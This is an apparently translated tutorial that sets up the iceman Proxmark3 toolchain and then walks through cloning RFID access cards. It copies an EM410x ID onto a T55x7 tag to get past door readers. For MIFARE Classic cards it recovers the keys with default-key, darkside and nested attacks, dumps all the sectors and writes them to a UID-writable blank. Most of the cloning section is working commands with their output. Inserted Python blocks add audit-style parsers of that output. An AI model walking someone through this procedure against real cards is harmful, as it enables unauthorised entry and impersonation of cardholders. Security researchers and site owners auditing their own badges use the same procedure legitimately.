I. Compiling and upgrading the Proxmark3 client on Kali Linux
This uses the iceman firmware as the example: the iceman fork offers more features and is updated more frequently.
1. Install the dependencies
sudo apt-get install p7zip git build-essential
sudo apt-get install libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config
sudo apt-get install wget libncurses5-dev gcc-arm-none-eabi
2. Clone the iceman repository and build the client
cd ~ ##switch to the home directory
git clone https://github.com/iceman1001/proxmark3.git ##clone the repository
cd proxmark3 ##enter the directory (it is cloned into the home directory, not the filesystem root)
git pull ##update the repository; later upgrades can start directly from this step
make clean && make all ##build the client and firmware
3. Upgrading the Proxmark3 firmware
Many newcomers are warned by so-called veterans or by vendors not to flash the firmware themselves and never to flash the bootrom, because it supposedly bricks the PM3 easily. In reality, if a firmware upgrade fails, or you flash a bootrom and image that do not match each other, you only need to unplug and re-plug the PM3 and hold down the button on the PM3 while flashing to force the flash. On Windows the same applies when the firmware is broken and the computer no longer recognises the device: keep holding the PM3 button and the firmware can be force-flashed onto the PM3.
sudo client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf
##invoke the flasher program in the client folder to write the firmware; write the bootrom first
client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf
##flash the full image file
The device interface (ACM0 here) can be found with the following command
dmesg | grep -i usb
If the driver is an old version it connects in HID mode and needs to be upgraded to the newer CDC mode.
II. Cloning attacks on ID and IC cards
1. Tips for determining the card type
##enter the proxmark3 client
client/proxmark3 /dev/ttyACM0
hw tune
##test whether the antenna signal is normal; the output looks like this
pm3 --> hw tune
[=] measuring antenna characteristics, please wait...
....
[+] LF antenna: 24.08 V - 125.00 kHz
[+] LF antenna: 21.10 V - 134.00 kHz
[+] LF optimal: 24.50 V - 126.32 kHz
[+] LF antenna is OK
[+] HF antenna: 15.37 V - 13.56 MHz
[+] HF antenna is OK
[+] Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
pm3 -->
With no card present, the HF antenna voltage is 15.37 V (it may differ depending on your hardware); this is the HF antenna's unloaded voltage.
##voltage change when an HF card is placed on the antenna
pm3 --> hw tune
[=] measuring antenna characteristics, please wait...
...
[+] LF antenna: 24.08 V - 125.00 kHz
[+] LF antenna: 21.10 V - 134.00 kHz
[+] LF optimal: 24.50 V - 126.32 kHz
[+] LF antenna is OK
[+] HF antenna: 14.20 V - 13.56 MHz
[+] HF antenna is OK
[+] Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
The voltage dropped by more than 1 V. If the card placed on the HF antenna is a low-frequency card, the voltage changes very little, as in the reading below. This gives a simple way to tell what type a card is.
pm3 --> hw tune
[=] measuring antenna characteristics, please wait...
....
[+] LF antenna: 24.08 V - 125.00 kHz
[+] LF antenna: 21.10 V - 134.00 kHz
[+] LF optimal: 24.50 V - 126.32 kHz
[+] LF antenna is OK
[+] HF antenna: 15.74 V - 13.56 MHz
[+] HF antenna is OK
[+] Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
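The voltage-drop rule above can be applied mechanically to `hw tune` output, which is handy when checking what credential technology a building's card population actually uses. The following added example (not Proxmark3 code) extracts the antenna voltages, compares a no-card baseline with a reading taken with a card present, and applies the same more-than-1 V rule to the LF antenna line as well (a generalisation of the text, which only shows the HF case); the sample readings are constructed from the outputs above.

```python
import re

# Proxmark3 `hw tune` lines of interest, in the format printed by the iceman client.
HF_RE = re.compile(r"\[\+\] HF antenna:\s*([0-9.]+) V")
LF_RE = re.compile(r"\[\+\] LF antenna:\s*([0-9.]+) V - 125\.00 kHz")

# Constructed excerpts of the readings shown above: no card, HF card, LF card.
BASELINE = """[+] LF antenna: 24.08 V - 125.00 kHz
[+] LF antenna: 21.10 V - 134.00 kHz
[+] HF antenna: 15.37 V - 13.56 MHz"""
WITH_HF_CARD = """[+] LF antenna: 24.08 V - 125.00 kHz
[+] LF antenna: 21.10 V - 134.00 kHz
[+] HF antenna: 14.20 V - 13.56 MHz"""
WITH_LF_CARD_ON_HF = """[+] LF antenna: 24.08 V - 125.00 kHz
[+] LF antenna: 21.10 V - 134.00 kHz
[+] HF antenna: 15.74 V - 13.56 MHz"""


def antenna_voltages(tune_output: str) -> dict:
    """Extract the 125 kHz LF and 13.56 MHz HF antenna voltages (in volts)."""
    volts = {}
    for name, pattern in (("LF", LF_RE), ("HF", HF_RE)):
        m = pattern.search(tune_output)
        if m is None:
            raise ValueError(f"no {name} antenna line in hw tune output")
        volts[name] = float(m.group(1))
    return volts


def voltage_drops(baseline: str, with_card: str) -> dict:
    """Per-antenna voltage drop between a no-card reading and a reading with a card."""
    base, card = antenna_voltages(baseline), antenna_voltages(with_card)
    return {name: round(base[name] - card[name], 2) for name in base}


def classify_card(baseline: str, with_card: str, threshold_v: float = 1.0) -> str:
    """Rule from the text: a drop of more than threshold_v on an antenna means a
    card of that frequency is loading it. Returns 'HF', 'LF' or 'none'."""
    drops = voltage_drops(baseline, with_card)
    if drops["HF"] > threshold_v:
        return "HF"
    if drops["LF"] > threshold_v:  # same rule applied to the LF antenna (assumption)
        return "LF"
    return "none"  # little or no change: wrong antenna for this card, or no card
```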
2. Cloning ID cards (low frequency, LF)
An ID card is a low-frequency card whose ID is burned in at the factory and cannot be changed. A typical ID-card system only checks whether the card's ID is in its database: if it is, the door opens; if not, access is refused. So writing the ID card's ID onto a writable ID card is enough to get past the access control.
##place the ID card on the proxmark3's low-frequency antenna.
##read the ID; lf means the low-frequency toolset is used
pm3 --> lf search
NOTE: some demods output possible binary
if it finds something that looks like a tag
False Positives ARE possible
Checking for known tags:
EM410x pattern found
EM TAG ID : 08003C9F5F
Possible de-scramble patterns
Unique TAG ID : 10003CF9FA
HoneyWell IdentKey {
DEZ 8 : 03972959
DEZ 10 : 0003972959
DEZ 5.5 : 00060.40799
DEZ 3.5A : 008.40799
DEZ 3.5B : 000.40799
DEZ 3.5C : 060.40799
DEZ 14/IK2 : 00034363711327
DEZ 15/IK3 : 000068723472890
DEZ 20/ZK : 01000000031215091510
}
Other : 40799_060_03972959
Pattern Paxton : 139517279 [0x850DD5F]
Pattern 1 : 5597182 [0x5567FE]
Pattern Sebury : 40799 60 3972959 [0x9F5F 0x3C 0x3C9F5F]
[+] Valid EM410x ID Found!
From the output we learn that the card type is EM410x and the EM ID is 08003C9F5F. Next, write it straight to a new card.
Write it with the lf em 410x_write tool; the trailing 1 and 64 are the size of the data block written
pm3 --> lf em 410x_write 08003C9F5F 1 64
Writing T55x7 tag with UID 0x08003c9f5f (clock rate: 64)
#db# Started writing T55x7 tag ...
#db# Clock rate: 64
#db# Tag T55x7 written with 0xff822001b12f2bd6
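The "de-scramble patterns" in the `lf search` output above are one 40-bit ID rendered in the decimal layouts that access-control back-ends commonly store, which is what lets a site administrator match a scanned tag to an enrolment record (or confirm which records a lost card maps to). The following added example (not Proxmark3 code) reproduces those layouts; the byte mappings are inferred from the values printed above, and the Paxton, Pattern 1 and Sebury forms are omitted because their derivation is not shown on this page.

```python
def reverse_bits(byte: int) -> int:
    """Reverse the bit order inside one byte (used for the 'Unique TAG ID' form)."""
    return int(f"{byte:08b}"[::-1], 2)


def decode_em410x(em_id_hex: str) -> dict:
    """Return the de-scramble patterns of a 40-bit EM410x ID as `lf search` prints them.

    Mappings are inferred from the page's output for 08003C9F5F (assumption)."""
    if len(em_id_hex) != 10:
        raise ValueError("EM410x ID must be 40 bits (10 hex digits)")
    em_id = int(em_id_hex, 16)                 # raises ValueError on non-hex input
    raw = em_id.to_bytes(5, "big")
    unique_raw = bytes(reverse_bits(b) for b in raw)
    unique = int.from_bytes(unique_raw, "big")
    low16 = em_id & 0xFFFF                     # last two bytes
    low24 = em_id & 0xFFFFFF                   # last three bytes
    return {
        "EM TAG ID": em_id_hex.upper(),
        "Unique TAG ID": unique_raw.hex().upper(),          # each byte bit-reversed
        "DEZ 8": f"{low24:08d}",
        "DEZ 10": f"{em_id & 0xFFFFFFFF:010d}",             # low 32 bits
        "DEZ 5.5": f"{(em_id >> 16) & 0xFFFF:05d}.{low16:05d}",
        "DEZ 3.5A": f"{(em_id >> 32) & 0xFF:03d}.{low16:05d}",
        "DEZ 3.5B": f"{(em_id >> 24) & 0xFF:03d}.{low16:05d}",
        "DEZ 3.5C": f"{(em_id >> 16) & 0xFF:03d}.{low16:05d}",
        "DEZ 14/IK2": f"{em_id:014d}",                      # whole 40-bit value
        "DEZ 15/IK3": f"{unique:015d}",                     # whole bit-reversed value
        # each hex nibble of the bit-reversed ID written as two decimal digits
        "DEZ 20/ZK": "".join(f"{int(c, 16):02d}" for c in unique_raw.hex()),
        "Other": f"{low16}_{(em_id >> 16) & 0xFF:03d}_{low24:08d}",
    }
```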
3. Cloning IC cards
1. Read the card: hf 14a info
pm3 --> hf 14a info
UID : 15 54 C6 AC
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 | 1k Ev1
[=] proprietary non iso14443-4 card found, RATS not supported
[=] Answers to magic commands: NO
[+] Prng detection: WEAK
pm3 -->
The output shows that the card's UID is 1554C6AC, the card type is MIFARE Classic 1K (an M1 card), and its storage is 1 KB.
2. Cracking the card's keys: default-key test
Many M1 cards still use the factory default keys, so the keys can often be found simply by trying them
hf mf chk *1 ? t
pm3 --> hf mf chk *1 ? t
No key specified, trying default keys
[ 0] ffffffffffff
[ 1] 000000000000
[ 2] a0a1a2a3a4a5
[ 3] b0b1b2b3b4b5
[ 4] c0c1c2c3c4c5
[ 5] d0d1d2d3d4d5
[ 6] aabbccddeeff
[ 7] 1a2b3c4d5e6f
[ 8] 123456789abc
[ 9] 010203040506
[10] 123456abcdef
[11] abcdef123456
[12] 4d3a99c351dd
[13] 1a982c7e459a
[14] d3f7d3f7d3f7
[15] 714c5c886e97
[16] 587ee5f9350f
[17] a0478cc39091
[18] 533cb6c723f6
[19] 8fd0a4f256e9
................................
Time in checkkeys: 10 seconds
testing to read key B...
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| ffffffffffff | 1 | ffffffffffff | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ------------ | 0 | ------------ | 0 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ------------ | 0 | ffffffffffff | 1 |
|011| ------------ | 0 | ffffffffffff | 1 |
|012| ------------ | 0 | ffffffffffff | 1 |
|013| ------------ | 0 | ffffffffffff | 1 |
|014| ------------ | 0 | ffffffffffff | 1 |
|015| ------------ | 0 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Found keys have been transferred to the emulator memory
The key A and key B columns in the output are the keys of each sector. Next, the nested attack can be used to recover the keys of all sectors
2. Cracking the card's keys, alternative method: darkside attack
Another way to obtain the sector keys. If you are not running the iceman firmware, change the command to mifare
hf mf darkside
pm3 --> hf mf darkside
--------------------------------------------------------------------------------
executing Darkside attack. Expected execution time: 25sec on average
press pm3-button on the proxmark3 device to abort both proxmark3 and client.
--------------------------------------------------------------------------------
[+] Parity is all zero. Most likely this card sends NACK on every authentication.
[-] no candidates found, trying again
.
[-] no candidates found, trying again
.
[+] found 12 candidate keys.
[+] found valid key: ffffffffffff
A valid key is obtained
3. Cracking the card's keys: recovering the keys of all sectors
hf mf nested 1 0 A ffffffffffff d
pm3 --> hf mf nested 1 0 A ffffffffffff d
[+] Testing known keys. Sector count=16
[-] Chunk: 1.4s | found 24/32 keys (21)
[+] Time to check 20 known keys: 1 seconds
[+] enter nested attack
[+] target block: 20 key type: A
[+] target block: 20 key type: B -- found valid key [eba93a57cfe0]
[-] Chunk: 0.5s | found 1/32 keys (1)
[+] target block: 40 key type: A
[+] target block: 44 key type: A
[+] target block: 48 key type: A -- found valid key [505df95da97b]
[-] Chunk: 0.5s | found 21/32 keys (1)
[+] target block: 20 key type: A -- found valid key [1456c5a8301f]
[-] Chunk: 0.6s | found 2/32 keys (1)
[+] time in nested: 8 seconds
[+] trying to read key B...
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| ffffffffffff | 1 | ffffffffffff | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| 1456c5a8301f | 1 | eba93a57cfe0 | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| 505df95da97b | 1 | ffffffffffff | 1 |
|011| 505df95da97b | 1 | ffffffffffff | 1 |
|012| 505df95da97b | 1 | ffffffffffff | 1 |
|013| 505df95da97b | 1 | ffffffffffff | 1 |
|014| 505df95da97b | 1 | ffffffffffff | 1 |
|015| 505df95da97b | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
[+] saving keys to binary file hf-mf-1554C6AC-key.bin...
The keys of all sectors are recovered and saved as a binary *.bin file; the data of every sector can now be read
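Both key tables above (from `hf mf chk` and `hf mf nested`) list, per sector, which keys were recovered. From a defender's point of view the useful question is how many sectors of an issued card still use a factory or widely published default key, and how many have site-specific keys. The following added example (not Proxmark3 code) parses that table layout and classifies each sector; the default-key list is the one the `hf mf chk` run above printed, and the sample rows are constructed from the tables on this page.

```python
import re

# The first 20 keys the `hf mf chk` run above tried: factory / widely published defaults.
WELL_KNOWN_KEYS = frozenset({
    "ffffffffffff", "000000000000", "a0a1a2a3a4a5", "b0b1b2b3b4b5", "c0c1c2c3c4c5",
    "d0d1d2d3d4d5", "aabbccddeeff", "1a2b3c4d5e6f", "123456789abc", "010203040506",
    "123456abcdef", "abcdef123456", "4d3a99c351dd", "1a982c7e459a", "d3f7d3f7d3f7",
    "714c5c886e97", "587ee5f9350f", "a0478cc39091", "533cb6c723f6", "8fd0a4f256e9",
})

# One data row of the |sec|key A|res|key B|res| table; separator/header rows do not match.
ROW_RE = re.compile(r"^\|(\d{3})\|\s*(\S+)\s*\|\s*([01])\s*\|\s*(\S+)\s*\|\s*([01])\s*\|$")

# Constructed excerpt: rows taken from the chk and nested tables on this page.
SAMPLE_TABLE = """|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ------------ | 0 | ------------ | 0 |
|010| ------------ | 0 | ffffffffffff | 1 |
|011| 505df95da97b | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|"""


def parse_key_table(output: str) -> dict:
    """Map sector number -> {'A': key or None, 'B': key or None} (None = not recovered)."""
    sectors = {}
    for line in output.splitlines():
        m = ROW_RE.match(line.strip())
        if m is None:
            continue
        sec, key_a, res_a, key_b, res_b = m.groups()
        sectors[int(sec)] = {"A": key_a.lower() if res_a == "1" else None,
                             "B": key_b.lower() if res_b == "1" else None}
    return sectors


def audit_sectors(sectors: dict) -> dict:
    """Classify sectors: both keys default, both known but site-specific, one side
    recovered, or nothing recovered."""
    report = {"default": [], "custom": [], "partial": [], "unknown": []}
    for sec in sorted(sectors):
        found = [k for k in sectors[sec].values() if k is not None]
        if not found:
            report["unknown"].append(sec)
        elif len(found) < 2:
            report["partial"].append(sec)
        elif all(k in WELL_KNOWN_KEYS for k in found):
            report["default"].append(sec)
        else:
            report["custom"].append(sec)
    return report
```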
4. Reading the data of all sectors
hf mf dump
pm3 --> hf mf dump
|-----------------------------------------|
|------ Reading sector access bits...-----|
|-----------------------------------------|
|-----------------------------------------|
|----- Dumping all blocks to file... -----|
|-----------------------------------------|
[+] successfully read block 0 of sector 0.
[+] successfully read block 1 of sector 0.
[+] successfully read block 2 of sector 0.
[+] successfully read block 3 of sector 0.
[+] successfully read block 1 of sector 15.
[+] successfully read block 2 of sector 15.
[+] successfully read block 3 of sector 15.
[+] dumped 64 blocks (1024 bytes) to file hf-mf-1554C6AC-data.bin
The file was written successfully
5. Set the new card's UID and write all the data to complete the clone
Place the writable IC card on the HF antenna, first write the UID obtained when reading the card, then write the data of all sectors.
hf mf csetuid xxxxxxxx w
hf mf restore